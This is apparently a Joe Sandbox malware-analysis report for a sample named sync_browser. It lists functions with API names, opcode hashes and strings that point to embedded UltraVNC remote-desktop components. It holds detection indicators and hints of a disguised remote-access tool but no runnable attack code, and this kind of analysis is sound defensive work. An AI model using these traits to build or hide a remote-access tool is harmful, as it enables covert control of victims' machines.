                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeLibraryMessageSend
                                                                    • String ID:
                                                                    • API String ID: 3583424976-0
                                                                    • Opcode ID: 5a9c5ba6fc8a087abeda093f91cff5a2c035cde94b70426cc823780c6ac37473
                                                                    • Instruction ID: 88c18dbfd2deff9b0e5c8fd7e5ddf7e77e6e5a368c2bf94e3732ea831ef3990f
                                                                    • Opcode Fuzzy Hash: 5a9c5ba6fc8a087abeda093f91cff5a2c035cde94b70426cc823780c6ac37473
                                                                    • Instruction Fuzzy Hash: 77114829F0A55A85FF59DBA1C86167C1358AFD8F44F080272CE0E82A81CF2DE4B2E740
                                                                    Function 00007FF6DC12CBC0 Relevance: 3.0, APIs: 2, Instructions: 32networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: closesocketsetsockoptshutdownsocket
                                                                    • String ID:
                                                                    • API String ID: 3513852771-0
                                                                    • Opcode ID: 312866c292d7188c2f9fc1aa8d6132574570804f7b68aec9e7564259e9557771
                                                                    • Instruction ID: 67a8eeb5dc9ad150ceb4db5679f9d50f40c1237add85e1db7d469e89ad944acb
                                                                    • Opcode Fuzzy Hash: 312866c292d7188c2f9fc1aa8d6132574570804f7b68aec9e7564259e9557771
                                                                    • Instruction Fuzzy Hash: AEF0C2B6A1822B87FB209F24DC223B9A354AF42745F140636DB1CC66D0DF7ED1A68A40
                                                                    Function 00007FF6DC12D170 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: setsockopt
                                                                    • String ID:
                                                                    • API String ID: 3981526788-0
                                                                    • Opcode ID: 6674a668f832169722ee7df8d3b9e7f845b9a455c109241ca5fb51d15d315839
                                                                    • Instruction ID: 4342c24d1094f694e5abc1aad48c776d7c684edb23f35eefabf3fb20bb50b79b
                                                                    • Opcode Fuzzy Hash: 6674a668f832169722ee7df8d3b9e7f845b9a455c109241ca5fb51d15d315839
                                                                    • Instruction Fuzzy Hash: EEF09675A1819643F7219F70D8452B9A391FF85715F140A32DAADCAED4CFBCC1AB8B00
                                                                    Function 00007FF6DC12D1F0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CountTickselect
                                                                    • String ID:
                                                                    • API String ID: 2475007269-0
                                                                    • Opcode ID: 84556e81f7513f2c210acb167795192905406201bcbf957d422c0e9d6dbf8d4c
                                                                    • Instruction ID: 90a704fc14825484dd96809dc50f6dacd909b45c541baf1f1bbfd11f17852f40
                                                                    • Opcode Fuzzy Hash: 84556e81f7513f2c210acb167795192905406201bcbf957d422c0e9d6dbf8d4c
                                                                    • Instruction Fuzzy Hash: 0231373670469587EB14DF20E8541EC7752EB89F84F09803ACF0D8B789DE38D456C760
                                                                    Function 00007FF6DC1832EC Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNEL32(?,?,?,00007FF6DC1837F7,?,?,?,00007FF6DC17FFD1,?,?,?,?,00007FF6DC178C19), ref: 00007FF6DC183331
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep_errno
                                                                    • String ID:
                                                                    • API String ID: 1068366078-0
                                                                    • Opcode ID: e0fad309830d1d7079ffb5554beb775af7228a8f16d0edcc9117263fd617f576
                                                                    • Instruction ID: 0107aacdeeb00d14c1bc388a3b7bcc8716acd933cd7be03d3911a6c0c80e1e05
                                                                    • Opcode Fuzzy Hash: e0fad309830d1d7079ffb5554beb775af7228a8f16d0edcc9117263fd617f576
                                                                    • Instruction Fuzzy Hash: 0801A722B14A9585EB459B179C4046D77A9EB84FE0F5C4132EE5D43790CF38E862C700

                                                                    Non-executed Functions

                                                                    Function 00007FF6DC0C81AD Relevance: 463.1, APIs: 192, Strings: 72, Instructions: 1063COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfile$String$Write$Desktop$Threadwsprintf$FileModuleName$CloseCurrentErrorInputLastMessageOpen_errno_invalid_parameter_noinfo
                                                                    • String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DSMPluginConfig$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$Permission denied:Uncheck [_] Protect my computer... in run as dialog or use user with write permission.$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
                                                                    • API String ID: 634683900-3478490838
                                                                    • Opcode ID: 2effa7899f974a3009ccd12de8866d22f8568e5a4afa6748285aa8aa378eceda
                                                                    • Instruction ID: 4f2e72661d62d50d7a4e73ede415c234006322f073dc8f754404afcf86e0f9ab
                                                                    • Opcode Fuzzy Hash: 2effa7899f974a3009ccd12de8866d22f8568e5a4afa6748285aa8aa378eceda
                                                                    • Instruction Fuzzy Hash: B7E29275A18A6FA5EB108FA5EC54AEC2329FB84758F805033D51D87568DE7CE22FC780
                                                                    Function 00007FF6DC0CE1D0 Relevance: 457.8, APIs: 190, Strings: 71, Instructions: 1023COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfile$String$Write$Desktopwsprintf$Thread$CloseCurrentErrorInputLastMessageOpen_callnewh_itowmallocxtoa
                                                                    • String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$FileTransferTimeout$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
                                                                    • API String ID: 341937111-959611688
                                                                    • Opcode ID: bebf3fc636e9cd23de96e3967fec53c36efb0386d47568ff00354e72abbf8240
                                                                    • Instruction ID: 873430142b1ed264659c859908d763276e309658123f26b91abbc82f44b75a54
                                                                    • Opcode Fuzzy Hash: bebf3fc636e9cd23de96e3967fec53c36efb0386d47568ff00354e72abbf8240
                                                                    • Instruction Fuzzy Hash: 9CC20D65A18A6F91EF008B91EC549EC6368FB84798F805433D91ED7668DE7CE22FC740
                                                                    Function 00007FF6DC0F3E20 Relevance: 158.0, APIs: 55, Strings: 35, Instructions: 537libraryloaderthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$Event$DesktopThread$LoadMessageWindow$CreateFileFreeModuleNameObject$CloseCriticalDestroySectionTimer$ClassClipboardCombineCurrentDeleteDispatchEnterHandleInformationInputKillLeaveLongOpenPeekRectRegisterSleepStockTranslateUserViewerWaitfree
                                                                    • String ID: CaptureW8$ChangeWindowMessageFilter$SetHook$SetHooks$SetKeyboardFilterHook$SetMouseFilterHook$StartW8$StopW8$UnSetHook$UnSetHooks$WinVNC$WinVNC desktop sink$\schook64.dll$\vnchooks.dll$\w8hook64.dll$user32.dll$vncdesktopsink.cpp : InitWindow called$vncdesktopsink.cpp : InitWindow:!GetUserObjectInformation $vncdesktopsink.cpp : InitWindow:OpenInputdesktop Error $vncdesktopsink.cpp : InitWindow:OpenInputdesktop OK$vncdesktopsink.cpp : InitWindow:SelectHDESK to %s (%x) from %x$vncdesktopsink.cpp : InitWindow:SelectHDESK:!SetThreadDesktop $vncdesktopsink.cpp : OOOOOOOOOOOO %i %i$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_quit$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_user+3$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_user+4$vncdesktopsink.cpp : OOOOOOOOOOOO end dispatch$vncdesktopsink.cpp : OOOOOOOOOOOO load hookdll's$vncdesktopsink.cpp : OOOOOOOOOOOO start dispatch$vncdesktopsink.cpp : REct3 %i %i %i %i $vncdesktopsink.cpp : RFB_MOUSE_UPDATE $vncdesktopsink.cpp : RFB_SCREEN_UPDATE $vncdesktopsink.cpp : failed to create hook window$vncdesktopsink.cpp : failed to register window class$vnchook
                                                                    • API String ID: 3632263120-2889214834
                                                                    • Opcode ID: 7f86bcf90ac23ed3313e68ce7d85e9fffed402d6815da712985dc0a1a31e7d51
                                                                    • Instruction ID: 45273dcb9824c5a79ee6fc17b982cc840481d46f018267e5e7b9a5ddb67aaca9
                                                                    • Opcode Fuzzy Hash: 7f86bcf90ac23ed3313e68ce7d85e9fffed402d6815da712985dc0a1a31e7d51
                                                                    • Instruction Fuzzy Hash: 09525731A08AAA85EB54CF60E9586AE33ACFF88744F400537DA4DD36A4DF3DA567C740
                                                                    Function 00007FF6DC0DA130 Relevance: 79.1, APIs: 28, Strings: 17, Instructions: 317threadregistrysleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DesktopOpen$Close$EventThread$HandleProcess$FileModuleNameUser$CreateCriticalCurrentErrorExecuteInformationInitializeInputLastObjectQuerySectionShellSleepTokenValueVersionWindow
                                                                    • String ID: -softwarecadhelper$Ctrl-alt-del require service, no permission$Ctrl-alt-del require service, no permission$EnableLUA$Global\SessionEventUltraCad$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$UAC is Disable, make registry changes to allow cad$UltraVNC Warning$Warning$Winsta0\Default$cad.exe$open$vistahook.cpp : !GetUserObjectInformation $vistahook.cpp : OpenInputdesktop Error $vistahook.cpp : OpenInputdesktop OK$vistahook.cpp : SelectHDESK to %s (%x) from %x$vistahook.cpp : SelectHDESK:!SetThreadDesktop
                                                                    • API String ID: 1732492099-311746058
                                                                    • Opcode ID: 02dbd923165e2a0b1fe8487735a84df805fed272564b20ac068a7f21ef945b6f
                                                                    • Instruction ID: 15e534501facc0d499ca949eccf0d83c42b6580e66090a5c18253e129ab9ebff
                                                                    • Opcode Fuzzy Hash: 02dbd923165e2a0b1fe8487735a84df805fed272564b20ac068a7f21ef945b6f
                                                                    • Instruction Fuzzy Hash: 92F16931A18B5A85EB24DB21E8442AD33A9FF84754F540237DA5EC3AA4DF3DE527C700
                                                                    Function 00007FF6DC0D20E0 Relevance: 68.5, APIs: 33, Strings: 6, Instructions: 241sleeplibrarysynchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandleSleep$Event$PrivateProfileWait$CreateFileLibraryModuleNameObjectOpenSingle$AddressCodeDesktopExecuteExitFreeLoadMultipleObjectsProcProcessShellStringVersionWindow
                                                                    • String ID: Global\SessionEventUltra$Global\SessionEventUltraCad$SendSAS$cad.exe$open$sas.dll
                                                                    • API String ID: 767217470-2348971971
                                                                    • Opcode ID: 7d4960000cb2e9cc34650905f6e7b06f80ef93b8f83e24dd9411a62a6d9a1cef
                                                                    • Instruction ID: 6f5a0aad477a4efd42a458ce684a076b13064ed261969a54d64fc1e674426391
                                                                    • Opcode Fuzzy Hash: 7d4960000cb2e9cc34650905f6e7b06f80ef93b8f83e24dd9411a62a6d9a1cef
                                                                    • Instruction Fuzzy Hash: 18C19E25A0DB5A82FA169B61AD5027D23A8FF84B50F040237D96EC37A4CF3DE867C741
                                                                    Function 00007FF6DC0EF980 Relevance: 65.1, APIs: 20, Strings: 17, Instructions: 347libraryloaderwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CapsCompatibleCreateDeviceEnumErrorLastLibrary$AddressBitmapBitsDisplayFreeLoadProcSettingsWindows
                                                                    • String ID: DISPLAY$EnumDisplayDevicesA$USER32$WinVNC$mv video hook driver2$vncDesktop : memory device doesn't support GetDIBitsWinVNC cannot be used with this graphics device driver$vncDesktop : root device doesn't support BitBltWinVNC cannot be used with this graphic device driver$vncdesktop.cpp : Failed m_rootdc $vncdesktop.cpp : No driver used $vncdesktop.cpp : bitmap dimensions are %d x %d$vncdesktop.cpp : created memory bitmap$vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : failed to create compatibleDC(%d)$vncdesktop.cpp : failed to create memory bitmap(%d)$vncdesktop.cpp : got bitmap format$vncdesktop.cpp : unable to get display colour info$vncdesktop.cpp : unable to get display format
